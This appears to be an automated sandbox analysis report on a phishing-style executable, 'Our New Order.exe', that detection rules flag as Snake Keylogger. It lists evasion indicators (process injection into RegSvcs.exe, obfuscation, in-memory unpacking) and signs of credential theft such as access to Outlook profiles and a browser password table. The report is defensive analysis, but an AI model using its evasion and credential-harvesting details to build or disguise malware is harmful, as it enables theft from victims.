Source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6724, type: MEMORYSTR Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: Our New Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, -.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.Our New Order.exe.44c9100.4.raw.unpack, --.cs Base64 encoded string: 'p80Vgw3+lRtz7/nj7e1xoWRqXXU315WpLGdXggu9CosVuAUQs8kHqHDaK/oJx2ua'
Source: 0.2.Our New Order.exe.44a86e0.3.raw.unpack, --.cs Base64 encoded string: 'p80Vgw3+lRtz7/nj7e1xoWRqXXU315WpLGdXggu9CosVuAUQs8kHqHDaK/oJx2ua'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, ICRPT0nTRXyMRrreU9.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, ICRPT0nTRXyMRrreU9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, L75mhbiC4D3oIlZ4aC.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, L75mhbiC4D3oIlZ4aC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, L75mhbiC4D3oIlZ4aC.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, ICRPT0nTRXyMRrreU9.cs Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, ICRPT0nTRXyMRrreU9.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, L75mhbiC4D3oIlZ4aC.cs Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, L75mhbiC4D3oIlZ4aC.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, L75mhbiC4D3oIlZ4aC.cs Security API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/1@3/3
Source: C:\Users\user\Desktop\Our New Order.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Our New Order.exe.log Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Our New Order.exe Mutant created: \Sessions\1\BaseNamedObjects\wlDwdGaInHy
Source: Our New Order.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Our New Order.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\Our New Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: RegSvcs.exe, 00000003.00000002.3375452065.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002DBC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3375452065.0000000002DCB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3377029386.0000000003C0D000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Our New Order.exe Virustotal: Detection: 38%
Source: Our New Order.exe ReversingLabs: Detection: 69%
Source: unknown Process created: C:\Users\user\Desktop\Our New Order.exe "C:\Users\user\Desktop\Our New Order.exe"
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Our New Order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Our New Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Our New Order.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Our New Order.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, L75mhbiC4D3oIlZ4aC.cs .Net Code: RRco1ochBp System.Reflection.Assembly.Load(byte[])
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, L75mhbiC4D3oIlZ4aC.cs .Net Code: RRco1ochBp System.Reflection.Assembly.Load(byte[])
Binary contains a suspicious time stamp
Source: Our New Order.exe Static PE information: 0xF4F03540 [Mon Mar 22 07:16:16 2100 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_05FC6D74 push eax; ret 0_2_05FC6D75
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A42CA6 push eax; ret 0_2_07A42CA7
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A42480 push ebx; ret 0_2_07A4249A
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A424CB push ebp; ret 0_2_07A424DA
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A454DD push ebx; ret 0_2_07A454E6
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A424DB push edi; ret 0_2_07A4250A
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A4242B push ecx; ret 0_2_07A4243A
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A423AB push eax; ret 0_2_07A4240A
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A42BBE push eax; ret 0_2_07A42BBF
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A45B85 push edi; ret 0_2_07A45B8E
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A4A2ED push FFFFFF8Bh; iretd 0_2_07A4A2EF
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A429F0 push eax; ret 0_2_07A429F1
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A45900 push ebp; ret 0_2_07A45906
Source: C:\Users\user\Desktop\Our New Order.exe Code function: 0_2_07A428EE push eax; ret 0_2_07A428EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_011C24B9 push 8BFFFFFFh; retf 3_2_011C24BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05142840 push esp; retf 3_2_05142AC9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_05142E78 push esp; iretd 3_2_05142E79
Source: Our New Order.exe Static PE information: section name: .text entropy: 7.51571844038575
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, vTGVuAJoWjp8OgESipi.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nTZHGND5BG', 'nU2Hf4y75c', 'QbiHXywrlT', 'zskHHssmb7', 'OAWHI3yvFa', 'vx3HPTYJ5i', 'VveHj0a9Vr'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, rQuPBR5ZqhNFtDa6ii.cs High entropy of concatenated method names: 'XmCT9mpCrB', 'YJJTLDGjak', 'lsFTCFZiVY', 'JeNTmQFkgb', 'qHuTiFFiMH', 'NJZChmebm6', 'HocCZ2YS6k', 'yAXCS0SoUL', 'jIUCKIClx8', 'VXxCe64bVU'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, XgRMR1JMQVtwksv95qN.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'F7Tfu3WQPt', 'vVNfBJ7D8N', 'piNf2KWBi4', 'glqfqKhIev', 'YKCfsae6fx', 'UIBfFqlCyo', 'SDUflYWpik'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, Y1dpmsqGNYf82peiWw.cs High entropy of concatenated method names: 'NvxYD4uveR', 'yrlYBVCktA', 'FX3YqpSCvM', 'fpjYsmGfGP', 'RtqYamNdUy', 'IdlY0s4tob', 'K6JYpdy8pb', 'bf2Yxq4W49', 'e4aY63fJV7', 'bcNYytSB0e'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, rW9sRsyZ4cqbR7XHCk.cs High entropy of concatenated method names: 'wDYmVoZ9CV', 'TJ9mwt3YJI', 'UwTmTI82R1', 'JOKTRfpW4q', 'T1hTzwrPpA', 'dMvmMtt6je', 'O6dmJP45b5', 'MOlm41q0FP', 'G9PmvdSfp9', 'UWnmoICcUb'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, iZiVE2L8GlqTlJv0C2.cs High entropy of concatenated method names: 'Dispose', 'ju8JexktXb', 'Cyc4atXdd0', 'LehGXXEV5K', 'SiRJR03HOA', 'pNMJzCx4Zk', 'ProcessDialogKey', 'rIJ4MbhYUD', 'IB44Jv4GqO', 'FI844WiOf3'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, liOf3MRwpOruICAGId.cs High entropy of concatenated method names: 'Filfwi6E5n', 'ItlfCf786V', 'LQ7fTXVdEe', 'SDGfmN71AF', 'OsffG1LxQ6', 'gmsfiuryFF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, ICRPT0nTRXyMRrreU9.cs High entropy of concatenated method names: 'Ir0LqlQEuq', 'uMILsoxxY7', 'QQcLF5OTpj', 'XntLlaNZBp', 'BfrLhHJsjj', 'vN8LZ6nP0b', 'JiPLSR8sjk', 'OdiLKqfrnQ', 'kCQLe7P7wb', 'BJpLRRMkOb'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, eoNvb6SB8mu8xktXbF.cs High entropy of concatenated method names: 'frrGYKRrtF', 'RiEG3Eh1wm', 'NqiGGcK1cv', 'GaFGXIvRKj', 'TRAGIkj0Wn', 'QoBGja7Wdi', 'Dispose', 'tbfNVKHWwt', 'gQrNLQljSa', 'Y8SNwLvfGt'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, n8ssKuoPBC3snaZkqe.cs High entropy of concatenated method names: 'PK0JmCRPT0', 'iRXJiyMRrr', 'kO3JdwaUgp', 'dWPJO6uyWw', 'bOAJYHmGQu', 'wBRJtZqhNF', 'ReS0YOPk93nbcKe1JP', 'Jj5HRvsCDVWbrkAIwg', 'fADJJcX158', 'zgYJv1yyhd'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, abhYUDepB4v4GqOrI8.cs High entropy of concatenated method names: 'pIXG5n4Jsk', 'nl8GaIApVw', 'wQrG0BHmb0', 'WCPGpmV9Rd', 'rQqGxScF2r', 'YHHG6cJUor', 'UvEGykj2ET', 'E4jG8RuP6T', 'XJVGk4cy1d', 'AghGDoTfKR'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, hoh3rwlQWln2oJxAaB.cs High entropy of concatenated method names: 'Swe3d7HMTQ', 'mH83OMyXuE', 'ToString', 'mKp3VLQkW9', 'L7b3LgxC4P', 'paX3w3svYE', 'yw73CnGIfn', 'b913TrctZI', 'UFk3mvUKju', 'U4n3iapZTB'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, bQQlfUJJw3UpJqD0V6h.cs High entropy of concatenated method names: 'hvTfRMDTeo', 'D6NfzQ9dDL', 'fJjXMMR3B3', 'OoYXJW4Xdh', 'KmmX410oGC', 'adZXvo0m82', 'OdhXoARc39', 'TPpX9rfckU', 'b7oXV13dVf', 'Vm1XLMNkem'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, za85fBkLROUYjtCig4.cs High entropy of concatenated method names: 'olRmAvni8U', 'Ldem7mqgaA', 'aCim1m16Y8', 'b0KmQN4TPU', 'bLrmEfSQIb', 'mermgush1B', 'EFQmbvjxwV', 'Cvrmn207bD', 'cQvmc2s6UK', 'Rukmr9a1RI'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, OyWwLqr1PfNXwJOAHm.cs High entropy of concatenated method names: 'PHtCE1bCuk', 'OSwCbwZfBN', 'KN2w0Wib6V', 'fhLwpOO440', 'opqwxuInmX', 'GiJw6yYY61', 'R4BwyqmpLg', 'ksgw8nbtxs', 'k3vwksbXGU', 'kQOwDy69sc'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, bMKAvsxbmAZq8VkqjT.cs High entropy of concatenated method names: 'FXhTyydC4P', 'YqeTkjcseD', 'tpHT6Gt3vr', 'XqrTdL5ajV1NIHNUkpN', 'HuW5705dxoMDOhErLBn', 'fM2JGW5wf6QMCnbU9nX'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, Kou2Jnzhw1rWGqRk8x.cs High entropy of concatenated method names: 'l2mfgndeQL', 'p2Bfnq12yq', 'PgufcNlQKn', 'Ejef5CYDKJ', 's2KfaIrAa6', 'MPbfpa2MQi', 'Wj5fxhNnAQ', 'yYmfjiaepv', 'lC8fAktGdl', 'V79f7F3qCD'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, PGASnDpLnR6lOw6M6N.cs High entropy of concatenated method names: 'IaDTjhIjxP', 'cUuTAcmbup', 'Xr1T1yT6mZ', 'eBOTQEgryD', 'wWdTgtdtHd', 'csbTbQJ37x', 'hEPTcMEpiN', 'OUvTr98EdS', 'xif1Bn5ynH6KbOXcrXQ', 'aDx8RQ5G6osyL3lC0fF'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, jGF5CL2TDMfuYrmaiL.cs High entropy of concatenated method names: 'WWnUnqkPxL', 'ID5UcBlfd8', 'n0XU5Wo0Ey', 'K9cUaBclB1', 'CsaUpWr0QB', 'ou5Uxrtusw', 'oEJUy5spQR', 'FguU8KhX6d', 'Cf8UDLgKPD', 'spdUuVlgSm'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, L75mhbiC4D3oIlZ4aC.cs High entropy of concatenated method names: 'fnYv9glUTQ', 'zg9vV9xhFT', 'GiyvLY5DAc', 'VaJvw5ilyn', 'Ny6vCsavIv', 'MbIvTI0PVn', 'eMJvmYHGfV', 'vT2viVEMZ7', 'SNxvW6weM2', 'LG2vdOowTJ'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, Rrtg704VPrQFTPknDI.cs High entropy of concatenated method names: 'Bey1c9nuu', 'FmdQyy0sR', 'FrIghQbLJ', 'jfVbuLHqE', 'bNRcl7jZX', 'UrurFvfMM', 'MaW2fCiuykk8IHlcbp', 'e6pPeJ84XuJDCTqXZF', 'dMINsrhN4', 'bmffbHGYY'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, fp4cloZClZ5u1hgnPM.cs High entropy of concatenated method names: 'sFE3KCMKRS', 'onL3Rb8qyI', 'ULmNMETqfr', 'bVTNJDfdCB', 'Go33umtL3N', 'Jql3Bkn2K9', 'apA32ZIAid', 'pBd3qkKYwk', 'G233sWSnZr', 'd903FnLrvO'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, Jl8JbicO3waUgpoWP6.cs High entropy of concatenated method names: 'helwQdGyiN', 'PkLwgA3Aun', 'OaAwnqjs3U', 'OsYwcgbsnR', 'PhEwYEZ3wx', 'JrlwtVAMi5', 'tnVw31eDG5', 'Q8mwNwLVZY', 'OEWwGO050D', 'NBMwfh8Lc3'
Source: 0.2.Our New Order.exe.46251e8.2.raw.unpack, siT5obwmXiGnhx6kX0.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'xJH4e8cOtg', 'TZH4RbTFad', 'QSp4zOEkJE', 'rE3vMQBaLF', 'y0cvJObS69', 'UOgv4sd4Xv', 'xdtvvwl8ho', 'RiAYhDqq5cUhvrTnqdi'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, vTGVuAJoWjp8OgESipi.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nTZHGND5BG', 'nU2Hf4y75c', 'QbiHXywrlT', 'zskHHssmb7', 'OAWHI3yvFa', 'vx3HPTYJ5i', 'VveHj0a9Vr'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, rQuPBR5ZqhNFtDa6ii.cs High entropy of concatenated method names: 'XmCT9mpCrB', 'YJJTLDGjak', 'lsFTCFZiVY', 'JeNTmQFkgb', 'qHuTiFFiMH', 'NJZChmebm6', 'HocCZ2YS6k', 'yAXCS0SoUL', 'jIUCKIClx8', 'VXxCe64bVU'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, XgRMR1JMQVtwksv95qN.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'F7Tfu3WQPt', 'vVNfBJ7D8N', 'piNf2KWBi4', 'glqfqKhIev', 'YKCfsae6fx', 'UIBfFqlCyo', 'SDUflYWpik'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, Y1dpmsqGNYf82peiWw.cs High entropy of concatenated method names: 'NvxYD4uveR', 'yrlYBVCktA', 'FX3YqpSCvM', 'fpjYsmGfGP', 'RtqYamNdUy', 'IdlY0s4tob', 'K6JYpdy8pb', 'bf2Yxq4W49', 'e4aY63fJV7', 'bcNYytSB0e'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, rW9sRsyZ4cqbR7XHCk.cs High entropy of concatenated method names: 'wDYmVoZ9CV', 'TJ9mwt3YJI', 'UwTmTI82R1', 'JOKTRfpW4q', 'T1hTzwrPpA', 'dMvmMtt6je', 'O6dmJP45b5', 'MOlm41q0FP', 'G9PmvdSfp9', 'UWnmoICcUb'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, iZiVE2L8GlqTlJv0C2.cs High entropy of concatenated method names: 'Dispose', 'ju8JexktXb', 'Cyc4atXdd0', 'LehGXXEV5K', 'SiRJR03HOA', 'pNMJzCx4Zk', 'ProcessDialogKey', 'rIJ4MbhYUD', 'IB44Jv4GqO', 'FI844WiOf3'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, liOf3MRwpOruICAGId.cs High entropy of concatenated method names: 'Filfwi6E5n', 'ItlfCf786V', 'LQ7fTXVdEe', 'SDGfmN71AF', 'OsffG1LxQ6', 'gmsfiuryFF', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, ICRPT0nTRXyMRrreU9.cs High entropy of concatenated method names: 'Ir0LqlQEuq', 'uMILsoxxY7', 'QQcLF5OTpj', 'XntLlaNZBp', 'BfrLhHJsjj', 'vN8LZ6nP0b', 'JiPLSR8sjk', 'OdiLKqfrnQ', 'kCQLe7P7wb', 'BJpLRRMkOb'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, eoNvb6SB8mu8xktXbF.cs High entropy of concatenated method names: 'frrGYKRrtF', 'RiEG3Eh1wm', 'NqiGGcK1cv', 'GaFGXIvRKj', 'TRAGIkj0Wn', 'QoBGja7Wdi', 'Dispose', 'tbfNVKHWwt', 'gQrNLQljSa', 'Y8SNwLvfGt'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, n8ssKuoPBC3snaZkqe.cs High entropy of concatenated method names: 'PK0JmCRPT0', 'iRXJiyMRrr', 'kO3JdwaUgp', 'dWPJO6uyWw', 'bOAJYHmGQu', 'wBRJtZqhNF', 'ReS0YOPk93nbcKe1JP', 'Jj5HRvsCDVWbrkAIwg', 'fADJJcX158', 'zgYJv1yyhd'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, abhYUDepB4v4GqOrI8.cs High entropy of concatenated method names: 'pIXG5n4Jsk', 'nl8GaIApVw', 'wQrG0BHmb0', 'WCPGpmV9Rd', 'rQqGxScF2r', 'YHHG6cJUor', 'UvEGykj2ET', 'E4jG8RuP6T', 'XJVGk4cy1d', 'AghGDoTfKR'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, hoh3rwlQWln2oJxAaB.cs High entropy of concatenated method names: 'Swe3d7HMTQ', 'mH83OMyXuE', 'ToString', 'mKp3VLQkW9', 'L7b3LgxC4P', 'paX3w3svYE', 'yw73CnGIfn', 'b913TrctZI', 'UFk3mvUKju', 'U4n3iapZTB'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, bQQlfUJJw3UpJqD0V6h.cs High entropy of concatenated method names: 'hvTfRMDTeo', 'D6NfzQ9dDL', 'fJjXMMR3B3', 'OoYXJW4Xdh', 'KmmX410oGC', 'adZXvo0m82', 'OdhXoARc39', 'TPpX9rfckU', 'b7oXV13dVf', 'Vm1XLMNkem'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, za85fBkLROUYjtCig4.cs High entropy of concatenated method names: 'olRmAvni8U', 'Ldem7mqgaA', 'aCim1m16Y8', 'b0KmQN4TPU', 'bLrmEfSQIb', 'mermgush1B', 'EFQmbvjxwV', 'Cvrmn207bD', 'cQvmc2s6UK', 'Rukmr9a1RI'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, OyWwLqr1PfNXwJOAHm.cs High entropy of concatenated method names: 'PHtCE1bCuk', 'OSwCbwZfBN', 'KN2w0Wib6V', 'fhLwpOO440', 'opqwxuInmX', 'GiJw6yYY61', 'R4BwyqmpLg', 'ksgw8nbtxs', 'k3vwksbXGU', 'kQOwDy69sc'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, bMKAvsxbmAZq8VkqjT.cs High entropy of concatenated method names: 'FXhTyydC4P', 'YqeTkjcseD', 'tpHT6Gt3vr', 'XqrTdL5ajV1NIHNUkpN', 'HuW5705dxoMDOhErLBn', 'fM2JGW5wf6QMCnbU9nX'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, Kou2Jnzhw1rWGqRk8x.cs High entropy of concatenated method names: 'l2mfgndeQL', 'p2Bfnq12yq', 'PgufcNlQKn', 'Ejef5CYDKJ', 's2KfaIrAa6', 'MPbfpa2MQi', 'Wj5fxhNnAQ', 'yYmfjiaepv', 'lC8fAktGdl', 'V79f7F3qCD'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, PGASnDpLnR6lOw6M6N.cs High entropy of concatenated method names: 'IaDTjhIjxP', 'cUuTAcmbup', 'Xr1T1yT6mZ', 'eBOTQEgryD', 'wWdTgtdtHd', 'csbTbQJ37x', 'hEPTcMEpiN', 'OUvTr98EdS', 'xif1Bn5ynH6KbOXcrXQ', 'aDx8RQ5G6osyL3lC0fF'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, jGF5CL2TDMfuYrmaiL.cs High entropy of concatenated method names: 'WWnUnqkPxL', 'ID5UcBlfd8', 'n0XU5Wo0Ey', 'K9cUaBclB1', 'CsaUpWr0QB', 'ou5Uxrtusw', 'oEJUy5spQR', 'FguU8KhX6d', 'Cf8UDLgKPD', 'spdUuVlgSm'
Source: 0.2.Our New Order.exe.79b0000.6.raw.unpack, L75mhbiC4D3oIlZ4aC.cs High entropy of concatenated method names: 'fnYv9glUTQ', 'zg9vV9xhFT', 'GiyvLY5DAc', 'VaJvw5ilyn', 'Ny6vCsavIv', 'MbIvTI0PVn', 'eMJvmYHGfV', 'vT2viVEMZ7', 'SNxvW6weM2', 'LG2vdOowTJ'
